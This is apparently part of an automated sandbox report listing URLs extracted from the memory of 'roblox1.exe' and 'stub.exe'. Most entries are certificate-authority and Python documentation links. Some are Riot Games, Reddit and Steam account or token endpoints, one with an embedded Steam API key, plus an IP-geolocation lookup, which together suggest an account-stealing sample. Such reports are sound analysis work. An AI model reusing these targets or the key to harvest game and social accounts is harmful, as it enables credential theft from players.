                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                  Source: stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1941240820.00000213BE5C4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945425937.00000213BE5CB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE18E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                  Source: stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                  Source: stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl.exe
                  Source: stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                  Source: stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlsnippet&
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl2
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.aiohttp.org/en/stable/logging.html#format-specification
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEve
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945691017.00000213BE610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945691017.00000213BE610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1917018094.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://ip-api.com/jsonacityatimezoneaispaorgaasuMain.GetNetworkInfoT
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944291079.00000213BE1F4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940263810.00000213BE1F3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551665105.00000213BE184000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938249531.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1941279881.00000213BE162000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1917018094.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE51D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE59C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org:80
                  Source: stub.exe, 00000003.00000003.1937231343.00000213BE18E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939465237.00000213BEE32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://speleotrove.com/decimal/decarith.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                  Source: stub.exe, 00000003.00000003.1934346059.00000213BEE1F000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947473880.00000213BEE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                  Source: stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFDF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939349578.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938008443.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936968912.00000213BEFE4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/:1U
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: stub.exe, 00000003.00000002.1948524629.00000213BEF1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934896216.00000213BEF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945192279.00000213BE4FC000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                  Source: stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpsended_1it
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/userT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_tokenaaccess_tokenuandroid:com.example.myredditapp:v1.2.3uBea
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
